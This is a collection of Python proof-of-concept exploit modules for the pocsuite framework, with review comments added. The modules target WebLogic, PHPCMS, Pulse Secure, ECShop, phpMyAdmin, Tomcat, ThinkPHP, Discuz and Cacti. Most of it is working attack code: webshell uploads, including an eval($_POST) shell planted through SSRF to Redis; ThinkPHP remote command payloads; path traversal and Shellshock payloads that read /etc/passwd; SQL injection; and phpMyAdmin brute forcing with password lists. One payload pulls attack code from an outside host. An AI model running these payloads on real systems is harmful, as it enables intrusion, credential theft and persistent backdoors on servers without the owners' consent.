    # from pocsuite.lib.utils.funs import url2ip
    _port = re.findall(':(\d+)\s*', vul_url)
    if len(_port) != 0:
        _host = url2ip(vul_url)[0]
        _port = url2ip(vul_url)[1]
    else:
        _host = url2ip(vul_url)
        _port = "7001"
    # Always plain http, regardless of the scheme in self.url.
    vul_ip = "http://%s:%s/ws_utc/config.do" % (_host, _port)
    try:
        response = req.get(url=vul_ip, timeout=5, allow_redirects=False) # no redirects
        if (response.status_code == 200 and "WSDL" in response.text):
            url = "/ws_utc/resources/setting/keystore"
            target = "http://%s:%s/" % (_host, _port)
            response = upload_webshell(target, url)
            if (response != ""):
                result['VerifyInfo'] = {}
                result['VerifyInfo']['URL'] = vul_ip
                result['VerifyInfo']['Payload'] = response
                return self.save_output(result)
    except Exception as e:
        print e
        pass
    return self.save_output(result)
def _verify(self):
    """verify mode: expression-language injection check via a ``${a*b}`` path segment.

    Two random 4-digit factors are placed in the URL as ``${a*b}``; the
    request is sent without following redirects and the ``Location`` header
    is searched for the product.  A match records ``self.url``.  The rebuilt
    URL always uses the ``http://`` scheme.  Any exception is swallowed.
    Returns ``self.parse_output(result)``.
    """
    result = {}
    random1 = random.randint(999, 9999)
    random2 = random.randint(999, 9999)
    random3 = random1 * random2
    spliturl = self.url.split('/')
    targetUrl = spliturl[-1]
    # '${{{0}*{1}}}' formats to '${<random1>*<random2>}'.
    targetUrl = '${{{0}*{1}}}'.format(random1, random2) + "/" + targetUrl
    finalUrl = "http://"
    # Re-join every non-empty segment between the scheme and the last one.
    for i in range(1, len(spliturl) - 1):
        if spliturl[i] != '':
            finalUrl = finalUrl + spliturl[i] + "/"
    finalUrl = finalUrl + targetUrl
    #print finalUrl
    matchstring = str(random3)
    #print random3
    try:
        resp = req.get(finalUrl, allow_redirects=False)
        #print resp.headers
        # KeyError when no Location header is present is caught below.
        if matchstring in resp.headers['location'].lower():
            result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = self.url
    except:
        pass
    return self.parse_output(result)
def _verify(self):
    """Send one GET with a random 8-character token in Host, User-Agent,
    X-Forwarded-For and Cookie.

    On any request error ``response`` is set to ``""``.

    NOTE(review): no use of ``response`` and no return statement are visible
    here; the copied snippet appears truncated.
    """
    # result container returned to the framework
    result = {}
    # build request headers
    import random
    seed = "1234567890abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ"
    sa = []
    for i in range(8):
        sa.append(random.choice(seed))
    salt = ''.join(sa)
    # The same random token is reflected in every header so it can be
    # searched for in the response.
    headers = {
        'Host': salt,
        'User-agent': salt,
        'X-Forwarded-For': salt,
        'cookie': salt,
    }
    # Empty proxy map; the commented entries point at a local intercepting proxy.
    proxies = {
        # 'http': 'http://127.0.0.1:8080',
        # 'https': 'http://127.0.0.1:8080',
    }
    try:
        response = req.get(url=self.url, headers=headers, timeout=5, proxies=proxies)
    except Exception, e:
        response = ""
def _verify(self):
    """Request every path in ``self.filelist`` under ``self.url`` and collect the 200 bodies.

    A trailing ``/`` is stripped from the URL first.  Responses with status
    200 are stored in ``payload_dict`` keyed by full URL; errors are printed
    per path.  1-second timeout, no redirects.

    NOTE(review): ``payload_dict``/``final_url`` are never consumed and no
    return statement is visible; the copied snippet appears truncated.
    """
    # result container returned to the framework
    result = {}
    # target URL
    vul_url = '%s' % self.url
    print vul_url
    if vul_url[-1] == '/':
        vul_url = vul_url[:-1]
    print vul_url
    # candidate path list
    # payload_url = []
    # payload_content = []
    payload_dict = {}
    final_url = []
    # probe each path
    for file in self.filelist:
        targetURL = vul_url + file
        #print vul_url + file
        try:
            r = req.get(url=targetURL, timeout=1,allow_redirects=False) # no redirects
            r_text = r.text
            if r.status_code == 200:
                payload_dict[targetURL] = r_text
                # payload_url.append(targetURL)
                # payload_content.append(r_text)
        except Exception,e:
            print "error",e,targetURL
def _verify(self):
    """Register a PHPCMS member whose ``info[content]`` embeds a remote ``.txt?.php#.jpg`` image.

    The response is searched for the rewritten ``img src`` path; the
    matched path plus ``.php`` is then fetched and recorded as ``webshell``
    when it answers 200.  Returns ``self.parse_attack(result)``.

    NOTE(review): ``"******" % (username)`` raises TypeError at run time —
    these look like redaction placeholders left in the copied source.  Also
    ``shell[0]`` is indexed before ``if shell`` is tested, so a miss raises
    IndexError.
    """
    result = {}
    url = self.url + "/index.php?m=member&c=index&a=register&siteid=1"
    username = randomStr(6)
    password = randomStr(6, '1234567890')
    data = {
        "siteid": "1",
        "modelid": "1",
        "username": "******" % (username),
        "password": "******" % (password),
        "email": "*****@*****.**" % (username),
        # Remote fetch of php_attack.txt, stored server-side with a .php name.
        "info[content]": "<img src=http://pocsuite.org/include_files/php_attack.txt?.php#.jpg> ",
        "dosubmit": "1",
        "protocol": "",
    }
    # Three groups: prefix, /YYYY/MMDD/ directory, numeric file name.
    match = "img src=(.+?)(/[0-9]{4}/[0-9]{4}/)([0-9]+?).php"
    resp = req.post(url, data=data)
    shell = re.findall(match, resp.text)
    shellinfo = ''.join(shell[0]) + ".php"
    if shell:
        result['VerifyInfo'] = {}
        result['VerifyInfo']['URL'] = self.url
        shell_resp = req.get(shellinfo)
        if shell_resp.status_code == 200:
            result['VerifyInfo']['webshell'] = shellinfo
    return self.parse_attack(result)
def _verify(self):
    """Read ``/etc/passwd`` from a Pulse Secure appliance via the ``/dana-na/../`` traversal.

    ``self.url`` is rewritten to ``scheme://host`` (https) or
    ``scheme://host:port`` (http, port defaulting to 80); the original is
    kept in ``self.raw_url``.  A 200 whose text contains ``root:x:0:0:root``
    records the URL, the full passwd text and ``self.get_hosts()``.  Any
    exception is swallowed.  Returns ``self.parse_output(result)``.
    """
    result = {}
    self.raw_url = self.url
    host = urlparse.urlparse(self.url).hostname
    port = urlparse.urlparse(self.url).port
    scheme = urlparse.urlparse(self.url).scheme
    if port is None:
        port = "80"
    else:
        port = str(port)
    # https URLs drop the port entirely (an explicit https port is lost).
    if "https" == scheme:
        self.url = "%s://%s" % (scheme, host)
    else:
        self.url = "%s://%s:%s" % (scheme, host, port)
    paylaod = "/dana-na/../dana/html5acc/guacamole/../../../../../../../etc/passwd?/dana/html5acc/guacamole/"
    headers = {"User-Agent": "Mozilla/5.0",
               "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
               "Accept-Language": "en-US,en;q=0.5",
               "Accept-Encoding": "gzip, deflate",
               "Connection": "close",
               "Upgrade-Insecure-Requests": "1"}
    try:
        # verify=False disables TLS certificate validation; timeout=(connect, read).
        res = req.get(self.url + paylaod, verify=False, headers=headers, timeout=(10, 15))
        if "root:x:0:0:root" in res.text and res.status_code == 200:
            result["VerifyInfo"] = {}
            result["VerifyInfo"]["URL"] = self.url
            # The whole passwd file is stored in the result unredacted.
            result["VerifyInfo"]["passwd"] = res.text
            result["VerifyInfo"]["host"] = self.get_hosts()
    except Exception as e:
        pass
    return self.parse_output(result)
def _verify(self):
    """ECShop ``user.php?act=login`` Referer injection, then check for ``/1.php``.

    The serialized Referer carries a SQL payload with a hex-encoded PHP
    fragment.  A subsequent 200 on ``self.url + "/1.php"`` is recorded as
    ``ShellInfo``.  Any exception is swallowed.

    NOTE(review): no return statement is visible; the copied snippet
    appears truncated.
    """
    try:
        result = {}
        headers = {
            'Referer': '''554fcae493e564ee0dc75bdf2ebf94caads|a:2:{s:3:"num";s:280:"*/ union select 1,0x272f2a,3,4,5,6,7,8,0x7b24617364275d3b617373657274286261736536345f6465636f646528275a6d6c735a56397764585266593239756447567564484d6f4a7a4575634768774a79776e50443977614841675a585a686243676b58314250553152624d544d7a4e3130704f79412f506963702729293b2f2f7d787878,10-- -";s:2:"id";s:3:"'/*";}'''
        }
        att_url = self.url + "/user.php?act=login"
        response = req.get(att_url, headers=headers, timeout=10)
        # Only the status code of the dropped file is checked, not its content.
        res = req.get(self.url + "/1.php", timeout=10)
        if res.status_code == 200:
            result['ShellInfo'] = {}
            result['ShellInfo']['URL'] = self.url + "/1.php"
    except Exception, e:
        pass
def _netreq(self, target_url, username, password):
    """Attempt one phpMyAdmin login with ``username``/``password`` at ``target_url``.

    Each attempt fetches the login page to harvest ``set_session``, ``token``
    and cookies, then POSTs the form.  Success is any of the post-login page
    markers in ``flag_list`` appearing in the response.  The identical
    attempt is repeated up to 10 times, so a wrong password produces up to
    10 failed logins for the same account.

    Returns ``{'VerifyInfo': {'URL': ..., 'Payload': <urlencoded form>}}`` on
    success (the form includes the plaintext password), else ``{}``.
    Raises IndexError if the login page lacks ``set_session`` or ``token``.
    """
    result = {}
    flag_list = ['src="navigation.php', 'frameborder="0" id="frame_content"', 'id="li_server_type">', 'class="disableAjax" title=']
    for _ in range(10):
        res = req.get(url = target_url)
        set_session = re.findall(r"name=\"set_session\" value=\"(.*?)\" \/", res.text)[0]
        token = re.findall(r"name=\"token\" value=\"(.*?)\" \/", res.text)[0]
        # Flatten the response cookies into a single Cookie header.
        cookie = ''
        for x,y in res.cookies.get_dict().items():
            cookie = cookie + "{}={};".format(x,y)
        header = {
            "Content-Type":"application/x-www-form-urlencoded",
            "Cookie": cookie
        }
        payload = {
            "set_session": set_session,
            "pma_username": username,
            "pma_password": password,
            "server": "1",
            "target": "index.php",
            "token": token
        }
        payload = urllib.urlencode(payload)
        response = req.post(url = target_url, data=payload, headers=header)
        for flag in flag_list:
            if flag in response.content:
                result['VerifyInfo'] = {}
                result['VerifyInfo']['URL'] = target_url
                result['VerifyInfo']['Payload'] = payload
                return result
    return result
def vul_check(payload):
    """Send a raw HTTP/1.0 request for ``/<payload>`` to 127.0.0.1:8080 followed by
    ~36 KB of filler, then fetch ``verify_url``.

    The filler is 18 sends of a 2000-byte string written after the header
    terminator.  Returns the ``req.get(verify_url)`` response object.

    NOTE(review): ``base_url`` and ``verify_url`` are module-level names not
    visible here; the computed ``url`` is never used.
    """
    url = urlparse.urljoin(base_url, payload)
    sock = socket.socket()
    # Hard-coded loopback target; no timeout is set on the socket.
    sock.connect(("127.0.0.1", 8080))
    sock.send('GET /{} HTTP/1.0\r\n'.format(payload).encode('ascii'))
    sock.send('Host: 127.0.0.1\r\n'.encode('ascii'))
    sock.send('\r\n'.encode('ascii'))
    # 10 chars * 200 = 2000 bytes per send, 18 sends.
    str_five = 'testssdfsf' * 200
    sock.send(str_five.encode('ascii'))
    sock.send(str_five.encode('ascii'))
    sock.send(str_five.encode('ascii'))
    sock.send(str_five.encode('ascii'))
    sock.send(str_five.encode('ascii'))
    sock.send(str_five.encode('ascii'))
    sock.send(str_five.encode('ascii'))
    sock.send(str_five.encode('ascii'))
    sock.send(str_five.encode('ascii'))
    sock.send(str_five.encode('ascii'))
    sock.send(str_five.encode('ascii'))
    sock.send(str_five.encode('ascii'))
    sock.send(str_five.encode('ascii'))
    sock.send(str_five.encode('ascii'))
    sock.send(str_five.encode('ascii'))
    sock.send(str_five.encode('ascii'))
    sock.send(str_five.encode('ascii'))
    sock.send(str_five.encode('ascii'))
    # The response on the raw socket is never read.
    sock.close()
    get_verify_str = req.get(verify_url)
    return get_verify_str
def _verify(self):
    """Cacti Weathermap ``editor.php`` arbitrary file write check.

    ``set_map_properties`` with ``mapname=test.php`` stores the marker
    ``46ea1712d4b13b55b3f680cc5b8b54e8`` (sent as ``map_title``) into
    ``/plugins/weathermap/configs/test.php``; that file is then fetched and
    the marker searched for.  Returns ``self.parse_attack(result)``.

    Side effect on the target: ``configs/test.php`` is created and never
    removed.
    """
    result = {}
    # Single-quoted literal continued with backslash-newline; the query string
    # is one long GET.
    payload = '/plugins/weathermap/editor.php?plug=0&mapname=test.php&action=set_map_properties¶m=¶m2=&debug=existing&node_name=\
&node_x=&node_y=&node_new_name=&node_label=&node_infourl=&node_hover=&node_iconfilename=--NONE--&link_name=&link_bandwidth_in=&link_bandwidth_out=\
&link_target=&link_width=&link_infourl=&link_hover=&map_title=46ea1712d4b13b55b3f680cc5b8b54e8&map_legend=Traffic+Load&map_stamp=\
Created:+%b+%d+%Y+%H:%M:%S&map_linkdefaultwidth=7'
    vulurl = self.url + payload
    verurl = self.url + '/plugins/weathermap/configs/test.php'
    req.get(vulurl)
    req_ver = req.get(verurl)
    if req_ver.status_code == 200 and '46ea1712d4b13b55b3f680cc5b8b54e8' in req_ver.content:
        result['VerifyInfo'] = {}
        result['VerifyInfo']['URL'] = self.url
        result['VerifyInfo']['Payload'] = payload
    return self.parse_attack(result)
def upload_webshell(host, uri):
    """Upload ``test.jsp`` through the WebLogic ws_utc keystore endpoint and check it back.

    First changes the server's work/upload path via
    ``set_new_upload_path(host, get_new_work_path(host))`` — a persistent
    configuration change on the target that is not reverted here.  The
    multipart POST to ``host + uri`` returns XML; the last ``<id>`` is used
    to build ``/ws_utc/css/config/keystore/<id>_test.jsp``, which is fetched
    and must contain ``upload_content``.

    Returns True when the uploaded content is served back, else False.  The
    resulting path is printed on success.  Side effect on the target: the
    ``.jsp`` file is left in place.
    """
    set_new_upload_path(host, get_new_work_path(host))
    upload_content = "POC test"
    # Only used for the verification GET, not for the upload POST.
    headers = {
        'Content-Type': 'application/x-www-form-urlencoded',
        'X-Requested-With': 'XMLHttpRequest',
    }
    files = {
        "ks_edit_mode": "false",
        "ks_password_front": "test",
        "ks_password_changed": "true",
        "ks_filename": ("test.jsp", upload_content)
    }
    resp = req.post(host + uri, files=files)
    response = resp.text
    match = re.findall("<id>(.*?)</id>", response)
    if match:
        tid = match[-1]
        shell_path = host + "/ws_utc/css/config/keystore/" + str(
            tid) + "_test.jsp"
        if upload_content in req.get(shell_path, headers=headers).content:
            print shell_path
            return True
        else:
            return False
    else:
        return False
def _verify(self):
    """Probe every FCKeditor path in ``self.fckdir`` relative to the site root.

    The root is rebuilt as ``scheme://netloc/`` from ``self.url``.  Paths
    answering 200, 300 or 202 are stored in ``payload_dict`` keyed by URL;
    errors are ignored.  1-second timeout, no redirects.

    NOTE(review): ``payload_dict``/``final_url`` are never consumed and no
    return statement is visible; the copied snippet appears truncated.
    """
    # result container returned to the framework
    result = {}
    # target URL
    vul_url = '%s' % self.url
    from urlparse import urlparse, urlunparse, urljoin
    urlinfo = urlparse(vul_url)
    check_url = urlunparse(
        (urlinfo.scheme, urlinfo.netloc, '/', '', '', ''))
    #print check_url
    payload_dict = {}
    final_url = []
    for fckurl in self.fckdir:
        targetURL = urljoin(check_url, fckurl)
        #print targetURL
        try:
            r = req.get(url=targetURL, timeout=1, allow_redirects=False) # no redirects
            # print targetURL,r.status_code
            if r.status_code in [200, 300, 202]:
                #print u"vulnerable",targetURL
                # payload_url.append(targetURL)
                payload_dict[targetURL] = r.text
        except Exception, e:
            pass
def _verify(self):
    """Check whether CouchDB's ``/_config/`` endpoint is readable without authentication.

    Host and port are derived with ``url2ip``; port defaults to 5984 and the
    scheme is forced to http.  A 200 records ``self.url`` and the probed
    URL.  Errors are printed and ignored.  Returns ``self.save_output(result)``.
    """
    # result container returned to the framework
    result = {}
    # target URL
    vul_url = '%s' % self.url
    # use the port from the URL if present, else the default
    import re
    from pocsuite.lib.utils.funs import url2ip
    _port = re.findall(':(\d+)\s*', vul_url)
    if len(_port) != 0:
        _host = url2ip(vul_url)[0]
        _port = url2ip(vul_url)[1]
    else:
        _host = url2ip(vul_url)
        _port = '5984'
    # probe
    url = 'http://%s:%s/_config/' % (_host, _port)
    try:
        # verify=False disables TLS certificate validation (moot for the http URL built above).
        req_code = req.get(url, timeout=5, allow_redirects=True, verify=False).status_code
        # print req_code
        if req_code == 200:
            result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = self.url
            result['VerifyInfo']['Payload'] = url
    except Exception as e:
        # return host
        print e
        pass
    print '[+]26 poc done'
    return self.save_output(result)
def _verify(self, verify=True):
    """phpMyAdmin weak-credential check against ``self.url`` (and ``/phpmyadmin/index.php``).

    For each candidate URL whose page contains ``pma_password`` and
    ``phpMyAdmin``, every username in ``username_list`` is tried with every
    password in ``password_list`` (3 x 28 = 84 POSTs per URL).  A 200 whose
    body contains one of the post-login markers records the credentials and
    returns ``self.parse_attack(result)``.  ``verify`` is unused.

    NOTE(review): exceptions are re-raised, and no return is visible after
    the loop; the copied snippet appears truncated.
    """
    result = {}
    url_list = [self.url]
    flag_list = ['src=\"navigation.php', 'frameborder=\"0\" id=\"frame_content\"', 'id=\"li_server_type\">', 'class=\"disableAjax\" title=']
    if "phpmyadmin" not in self.url.lower():
        url_list.append(self.url + "/phpmyadmin/index.php")
    # Hard-coded credential lists.
    username_list = ['admin', 'root', 'test']
    password_list = ["", '123456789', 'a123456', '123456', 'a123456789', '1234567890', 'woaini1314', 'qwerasdf', 'abc123456', '123456a', '123456789a', '147258369', 'zxcvbnm', '987654321', 'qwer!@#$', 'abc123', '123456789.', '5201314520', 'q123456', '123456abc', '123123123', '123456.', '0123456789', 'asd123456', 'aa123456', 'q123456789', '!QAZ@WSX', '1qaz2wsx']
    for url in url_list:
        try:
            f_res = req.get(url, timeout=5)
            if "pma_password" in f_res.content and 'phpMyAdmin' in f_res.content:
                for username in username_list:
                    for password in password_list:
                        # No token/set_session handling here, unlike _netreq.
                        payload = {'pma_username': username, 'pma_password': password}
                        headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64)'}
                        res = req.post(url, headers=headers, data=payload, timeout=5)
                        for flag in flag_list:
                            if flag in res.content and res.status_code == 200:
                                result['VerifyInfo'] = {}
                                result['VerifyInfo']['url'] = url
                                result['VerifyInfo']['status_code'] = res.status_code
                                result['VerifyInfo']['username'] = username
                                result['VerifyInfo']['password'] = password
                                result['username'] = username
                                result['password'] = password
                                return self.parse_attack(result)
        except Exception as e:
            raise e
def _verify(self):
    """Tomcat HTTP PUT check: upload ``test.txt`` and read it back.

    ``self.host_port`` normalizes the URL; ``test.txt`` is PUT with a marker
    string (``cve201712617``) and then fetched.  A body containing the
    marker records the path and payload.  All exceptions are swallowed
    (bare ``except``).  Returns ``self.save_output(result)``.

    Side effect on the target: ``test.txt`` is created and never deleted.
    """
    # result container returned to the framework
    result = {}
    # target URL
    vul_url = '%s' % self.url
    # normalized URL
    vul_url = self.host_port(vul_url)
    # PoC path and payload
    poc_path = urlparse.urljoin(vul_url, "test.txt")
    payload = "this is Vulnerable cve201712617!"
    # probe
    try:
        #print urlparse.urljoin(vul_url,poc_name)
        # verify=False disables TLS certificate validation for the PUT.
        poc_req = req.put(url=poc_path, data=payload, verify=False)
        #print poc_req.content
        poc_content = req.get(url=poc_path).content
        #print poc_content
        if 'cve201712617' in poc_content:
            #print u'\n[WARNING] ' + vul_url + " [vulnerable]"
            result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = poc_path
            result['VerifyInfo']['Payload'] = payload
        else:
            #print u'\n[not vulnerable] ' + vul_url
            pass
    except:
        # return vul_url
        pass
    print '[+]18 poc done'
    return self.save_output(result)
def _verify(self):
    """Check a ThinkPHP target by sending each entry of ``payloads2`` and inspecting the response text.

    Resolves host and port from ``self.url``, first confirms the TCP port is
    reachable, then issues one GET per payload.  A response containing both
    ``index.php`` and ``robots.txt``, or containing ``Configuration File``,
    is recorded in ``result`` and returned immediately.

    Returns:
        ``self.save_output(result)``; ``result`` is empty when the port is
        closed or no payload produced a matching response.

    NOTE(review): ``payloads`` (marker-only probes) is built but never used;
    the loop sends ``payloads2``, whose entries execute commands on the
    target, so this verify step is not side-effect free.
    """
    result={}
    # If a port is set use it, otherwise fall back to the default port.
    import re
    import socket
    import time  # unused
    vul_url = "%s"%self.url
    # NOTE(review): the import of url2ip is commented out; unless it is
    # provided elsewhere in the module, the calls below raise NameError.
    # from pocsuite.lib.utils.funs import url2ip
    _port = re.findall(':(\d+)\s*', vul_url)
    if len(_port) != 0:
        _host = url2ip(vul_url)[0]
        _port = int(url2ip(vul_url)[1])
    else :
        _host = url2ip(vul_url)
        _port = 80
    # Check whether the port is open.
    import socket  # duplicate of the import above
    sk = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sk.settimeout(1)
    try:
        sk.connect((_host,_port))
    except Exception:
        # NOTE(review): returns without sk.close(); a with/finally would
        # release the socket on this path too.
        return self.save_output(result)
    sk.close()
    # Scheme is fixed to http regardless of what self.url used.
    vul_ip = "http://%s:%s/" % (_host, _port)
    payloads=["index.php?s=index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=printf&vars[1][]=ads3234asdg34ggasda222",
              "index.php?s=admin/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=printf&vars[1][]=ads3234asdg34ggasda222",
              "index.php?s=index/\\think\Request/input&filter=printf&data=ads3234asdg34ggasda222",
              "index.php?s=index/\\think\\view\driver\Php/display&content=<?php printf 'ads3234asdg34ggasda222';?>",
              "index.php?s=index/\\think\Container/invokefunction&function=call_user_func_array&vars[0]=printf&vars[1][]=ads3234asdg34ggasda222"]
    payloads2=["index.php?s=index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls",
               "index.php?s=admin/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=assert&vars[1][]=phpinfo()",
               "index.php?s=index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=dir",
               "index.php?s=index/\\think\\view\driver\Php/display&content=<?php phpinfo();?>",
               "index.php?s=index/\\think\Container/invokefunction&function=call_user_func_array&vars[0]=assert&vars[1][]=phpinfo()",
               "index.php?s=index/\\think\Container/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls",
               "index.php?s=index/\\think\Container/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=dir"]
    for p in payloads2:
        url=vul_ip+p
        try:
            text = req.get(url,timeout=4).text
            if ("index.php" in text and "robots.txt" in text) or ("Configuration File" in text):
                result['VerifyInfo'] = {}
                result['VerifyInfo']['URL'] = vul_ip
                result['VerifyInfo']['Payload'] = p
                return self.save_output(result)
        except Exception as e:
            # Errors are printed and the next payload is tried.
            print e
            pass
    return self.save_output(result)
def _attack(self):
    """Attack routine for the Discuz SSRF-to-Redis chain: plants a PHP file and records it in ``result``.

    Sends ``payload`` through ``self.url``, then walks up the URL path one
    segment at a time (stopping at the host) looking for ``forum.php``.  On a
    200 it writes a randomly named ``.php`` file next to it, fetches that file,
    and — only when the random ``flag`` is echoed back — records the shell
    URL, issues the Redis flush request and re-requests ``forum.php``.

    Returns:
        ``self.parse_output(result)``; ``result`` is empty when no candidate
        path produced a verified file.

    NOTE(review): no request here carries a timeout, the response to the first
    ``req.get(vul_url)`` is discarded, and the planted ``.php`` file is never
    removed by this routine.
    """
    result = {}
    # Request string appended to self.url.
    payload = ('gopher://127.0.0.1:6379/'
               '_eval "local t=redis.call(\'keys\',\'*_setting\');'
               'for i,v in ipairs(t) do redis.call(\'set\',v,'
               '\'a:2:{s:6:\\\"output\\\";a:1:{s:4:\\\"preg\\\";'
               'a:2:{s:6:\\\"search\\\";a:1:{s:7:\\\"plugins\\\";'
               's:5:\\\"/^./e\\\";}s:7:\\\"replace\\\";'
               'a:1:{s:7:\\\"plugins\\\";s:32:\\\"system(base64_decode($_GET[c]));\\\";}}}'
               's:13:\\\"rewritestatus\\\";a:1:{s:7:\\\"plugins\\\";i:1;}}\')'
               ' end;return 1;" 0 %250D%250Aquit')
    vul_url = self.url + payload
    req.get(vul_url)
    # Walk parent directories until the remaining tail is the host itself.
    web_url = self.url.rpartition('/')
    while web_url[2] != urlparse.urlparse(self.url).netloc:
        shell_url = web_url[0] + '/forum.php?mod=ajax&inajax=yes&action=getthreadtypes'
        rep = req.get(shell_url)
        if rep.status_code == 200:
            # Using this file as the one-liner directly gets the payload blocked,
            # and the shell is lost after the flush, so a command is used to
            # write a one-liner into the current directory instead.
            flag = ''.join([random.choice(string.digits) for _ in range(8)])
            shell_flag = ''.join([random.choice(string.lowercase) for _ in range(8)])
            shell_payload = 'echo \'<?php @eval($_POST[c]);echo "' + flag + '";?>\' > ' + shell_flag + '.php'
            shell_payload_b64 = base64.b64encode(shell_payload)
            req.get(shell_url + '&c=' + shell_payload_b64)
            shell_url = web_url[0] + '/' + shell_flag + '.php'
            rep = req.get(shell_url)
            if rep.status_code == 200 and flag in rep.content:
                result['ShellInfo'] = {}
                result['ShellInfo']['URL'] = shell_url
                result['ShellInfo']['Content'] = '@eval($_POST[c]);'
                # Restore after verification so the site stays reachable.
                payload_flush = 'gopher://127.0.0.1:6379/_*1%250D%250A$8%250D%250Aflushall%250D%250Aquit'
                recover_url = self.url + payload_flush
                req.get(recover_url)
                req.get(web_url[0] + '/forum.php')
                break
        web_url = web_url[0].rpartition('/')
    return self.parse_output(result)
def _attack(self):
    """Attack routine (``xeval`` variant): plants a randomly named PHP file beside ``forum.php`` and records it.

    Sends ``payload`` through ``self.url``; when that returns 200 it requests
    ``forum.php`` under the parent path, writes the file, fetches it, and
    records the shell URL only when the random ``flag`` is echoed back.  The
    flush request and a final ``forum.php`` fetch run whenever ``forum.php``
    answered 200, regardless of whether the file was verified.

    Returns:
        ``self.parse_output(result)``; ``result`` is empty when the first
        request was not 200, ``forum.php`` was not 200, or the flag was absent.

    NOTE(review): no request carries a timeout, and the planted ``.php`` file
    is never removed by this routine.
    """
    result = {}
    # url_part[0] is self.url with its last path segment removed.
    url_part = self.url.rpartition('/')
    payload = ('gopher://127.0.0.1:6379/xeval '
               '"local t=redis.call(\'keys\',\'*_setting\');'
               'for i,v in ipairs(t) do redis.call(\'set\',v,'
               '\'a:2:{s:6:\\"output\\";a:1:{s:4:\\"preg\\";'
               'a:2:{s:6:\\"search\\";a:1:{s:7:\\"plugins\\";'
               's:5:\\"/^./e\\";}s:7:\\"replace\\";a:1:{s:7:\\"plugins\\";'
               's:40:\\"system(base64_decode($_GET[dshtanger]));\\";}}}'
               's:13:\\"rewritestatus\\";a:1:{s:7:\\"plugins\\";i:1;}}\') end;'
               'return 1;" 0 %250D%250Aquit')
    target_url = self.url + payload
    vul_rep = req.get(target_url)
    # NOTE(review): the loop body ends in an unconditional break, so this
    # ``while`` runs at most once; an ``if`` would state the intent directly.
    while vul_rep.status_code == 200:
        shell_url = url_part[0] + '/forum.php?mod=ajax&inajax=yes&action=getthreadtypes'
        shell_rep = req.get(shell_url)
        if shell_rep.status_code == 200:
            random_sed = string.letters+string.digits
            flag = ''.join([random.choice(random_sed) for _ in range(8)])
            shell_flag = ''.join([random.choice(random_sed) for _ in range(8)])
            # use system() to write a shell php file; the shell is retained after flushing redis/apache
            shell_payload = 'echo \'<?php @eval($_POST[dshtanger]);echo "' + flag + '";?>\' > ' + shell_flag + '.php'
            shell_payload_b64 = base64.b64encode(shell_payload)
            # write a randomly named php file
            req.get(shell_url + '&dshtanger=' + shell_payload_b64)
            # access that php file
            verify_url = url_part[0] + '/' + shell_flag + '.php'
            verify_rep = req.get(verify_url)
            if (verify_rep.status_code == 200) and ( flag in verify_rep.content):
                result['ShellInfo'] = {}
                result['ShellInfo']['URL'] = verify_url
                result['ShellInfo']['Content'] = '@eval($_POST[dshtanger]);'
            # recover the website
            flush_payload = 'gopher://127.0.0.1:6379/xflushall%0D%0Aquit'
            flush_url = self.url + flush_payload
            req.get(flush_url)
            test_url = url_part[0] + '/forum.php'
            req.get(test_url)
        break
    return self.parse_output(result)
def _verify(self):
    """Check the ``comment_list`` endpoint for an error-based SQL injection by looking for a ``~~~...~~~`` marker in the response.

    Appends ``payload`` to the ``commentid`` parameter of ``vulurl`` and
    records URL and payload in ``result`` when the marker pattern matches.

    Returns:
        ``self.parse_output(result)``; ``result`` is empty when the marker is
        absent.
    """
    result = {}
    vulurl = "%s/index.php?m=wap&c=index&a=comment_list&commentid=content_12" % self.url
    # Appended directly to the commentid value above (no separator).
    payload = "%2527%20or%20updatexml(1,concat(0x7e7e7e,version(),0x7e7e7e)),0)%23-84-1"
    # NOTE(review): no timeout, so an unresponsive host blocks the scanner.
    resp = req.get(vulurl+payload)
    # Anything bracketed by the ~~~ delimiters counts as a hit.
    re_result = re.findall(r'~~~(.*?)~~~', resp.content, re.S|re.I)
    if re_result:
        result['VerifyInfo'] = {}
        result['VerifyInfo']['URL'] = vulurl
        result['VerifyInfo']['Payload'] = payload
    return self.parse_output(result)
def _verify(self):
    """Check ``/tarantella/cgi-bin/modules.cgi`` for Shellshock by sending the probe in ``User-Agent`` and looking for passwd content.

    Records ``self.url`` and the probe string in ``result`` when the response
    text contains ``root:x:0:0:root:``.

    Returns:
        ``self.parse_output(result)``; ``result`` is empty on no match.

    NOTE(review): the result keys differ from the other PoCs in this file
    (``Url`` instead of ``URL``), and ``PostData`` actually holds a request
    header sent with a GET.  The probe string is also duplicated rather than
    reused from ``header['User-Agent']``.
    """
    result = {}
    header = {
        'User-Agent': '() { :; }; echo; /bin/cat /etc/passwd'
    }
    # No timeout on the request.
    res = req.get("%s/tarantella/cgi-bin/modules.cgi" % self.url, headers = header)
    if 'root:x:0:0:root:' in res.text:
        result['VerifyInfo'] = {}
        result['VerifyInfo']['Url'] = self.url
        result['VerifyInfo']['PostData'] = '() { :; }; echo; /bin/cat /etc/passwd'
    return self.parse_output(result)
def _attack(self):
    """Attack routine using a local ``ssrf.php`` relay: writes ``shell.php`` beside ``forum.php`` and records it.

    Rewrites ``self.url`` to end with a trailing slash, sends ``payload``
    through ``ssrf_url``, then requests ``forum.php``; on a 200 it issues the
    write, fetches ``shell.php?she1l=phpinfo();`` and records the shell URL
    when ``phpinfo`` appears in the response.

    Returns:
        ``self.parse_output(result)``.  The ``return`` inside the loop means
        the ``while`` body runs at most once; the final ``return`` is reached
        only when the first request was not 200.

    NOTE(review): ``self.url`` is mutated on the instance, and because the
    rewritten value ends in ``/`` the ``self.url + '/forum.php...'`` join
    produces a double slash.  The fixed file name ``shell.php`` is never
    removed by this routine.
    """
    result = {}
    ssrf_url = "ssrf.php?ssrf="  # the corresponding Discuz-side relay file
